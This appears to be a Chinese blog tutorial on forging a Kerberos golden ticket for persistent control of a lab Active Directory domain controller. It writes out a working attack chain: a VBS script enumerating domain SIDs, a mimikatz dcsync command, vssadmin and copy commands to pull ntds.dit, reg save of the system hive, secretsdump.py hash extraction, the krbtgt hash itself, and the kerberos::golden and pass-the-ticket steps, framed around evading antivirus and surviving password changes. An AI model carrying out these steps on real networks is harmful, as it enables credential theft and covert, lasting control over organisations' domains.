0
点赞
收藏
分享

微信扫一扫

实战中黄金票据的制作

IT程序员 2022-01-30 阅读 49
安全

0x00 前言

当控制了一台域控服务器的情况下,为了不打草惊蛇又为了长时间控制,可以考虑使用黄金票据进行权限维持。

目前以控制一台域内成员机器WIN2016,ip:10.0.10.111  无杀软

一台域控机器WIN2019,ip:10.0.10.110                           有杀软

域名:vulntarget.com

域管:vulntarget\administrator

域管密码:Admin@666

通过之前的攻击,我们拿到了域管理员的账号密码,并通过wmiexec成功从WIN2016连接并控制了WIN2019

 0x01 黄金票据制作前

前置条件

在使⽤⻩⾦票据(Golden Ticket)攻击时,需要以下信息:
需要伪造的域管理员⽤户名(⼀般是域管账户,这里我们就是administrator)
完整的域名
域 krbtgt SID(就是域成员krbtgt SID去掉最后的)
krbtgt 的 NTLM Hash 或 AES-256 值

krbtgt SID获取

将该vbs脚本上传到目标机器上

On Error Resume Next
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_UserAccount Where LocalAccount='False'")

For Each objItem in colItems
WScript.Echo objItem.Name & "," & objItem.SID
Next

 我们不要后面的502(RID),只要:S-1-5-21-3795598892-1521228294-2653055093

krbtgt NTLM哈希获取

如果目标机器可以使用mimikatz的话那很简单

mimikatz.exe "log" "privilege::debug" "lsadump::dcsync /domain:vulntarget.com /user:krbtgt" "exit"

这就是我们想要获得的,但是目标机器存在杀软,假设我们也没有免杀的mimikatz,那么如何获得krbtgt的NTLM哈希呢,我们可以通过vssadmin将整个ntds.dit弄下来然后解密所有域内机器和用户的哈希。

vssadmin 是 Windows Server 2008 及 Windows 7 提供的 VSS 管理工具,可用于创建和删除卷影拷贝、列出卷影的信息(只能管理系统 Provider 创建的卷影拷⻉)、显示已安装的所有卷影拷贝写⼊程序(writers)和提供程序(providers),以及改变卷影拷⻉的存储空间(即所谓的“diff空间”)的大小等。

第一步:创建⼀个 C 盘的卷影拷贝

vssadmin create shadow /for=c:

第二步:在创建的卷影拷贝中将 ntds.dit 复制出来:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit

 可以看到ntds.dit已经被复制出来

第三步:删除快照

vssadmin Delete Shadows /For=C: /Oldest

最后还需转储 system.hive,system.hive 中存放着ntds.dit的密钥,如果没有该密钥,将⽆法查看 ntds.dit 中的信息: 

reg save hklm\system system.hive

此时我们会发现这两个文件已经被我们弄到了域控机器的C盘上了,但是如何在不免杀上线cs等c2工具上将这两个文件下载到我们控制的WIN2016机器上呢,我们可以用impacket工具包中的wmiexec.py连接控制域控,而不要使用wmiexec.vbs 因为前者自带一个lget命令(最新版impacket)get命令(旧版impacket)

 

 这样就可以了,我们将这两个文件都下载下来,然后再使用impacket工具包中的secretdump.py脚本

python3 secretsdump.py -system system.hive -ntds ntds.dit LOCAL

这样我们也成功拿到了krbtgt的NTLM哈希,准确的说我们要的是:后面那段:a3dd8e4a352b346f110b587e1d1d1936

0x02 黄金票据制作

所有需要的东西都拿到了,那我们就可以在本地无杀软的环境中利用mimikatz制作黄金票据

kerberos::golden /user:administrator /domain:vulntarget.com /sid:S-1-5-21-3795598892-1521228294-2653055093 /krbtgt:a3dd8e4a352b346f110b587e1d1d1936 /ticket:Administrator.kiribi

成功生成Administrator.kirbi的黄金票据。 接下来在WIN2016的机器上利用mimikatz进行票据传递

未注入前WIN2016连接域控是拒绝访问的

 不用管理员权限运行mimikatz,通过ptt的方法将票据传递过去,就可以访问域控了


 之后我们的打法就变成了IPC连接后的打法了,上传下载文件,计划任务执行啥的都可以后续继续操作了,至于为啥一定要做个黄金票据权限维持呢,这样的好处就是如果域管账号密码更改了,我们也可以依然控制着域控,不会收到任何影响

举报

相关推荐

0 条评论